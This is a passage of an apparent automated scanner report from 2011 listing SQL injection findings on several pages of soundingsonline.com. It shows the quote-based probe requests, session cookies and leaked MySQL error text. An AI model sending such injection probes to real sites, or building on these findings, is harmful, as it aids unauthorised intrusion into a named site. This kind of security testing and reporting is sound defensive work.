The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/dispatches?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/dispatches?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.57. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/home-waters?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/home-waters?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.58. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.59. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/sailing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/sailing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.60. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/todays-top-stories?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/todays-top-stories?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.61. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /resources?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.62. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /site-map?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /site-map?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.63. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.64. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/preview-current-issue?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
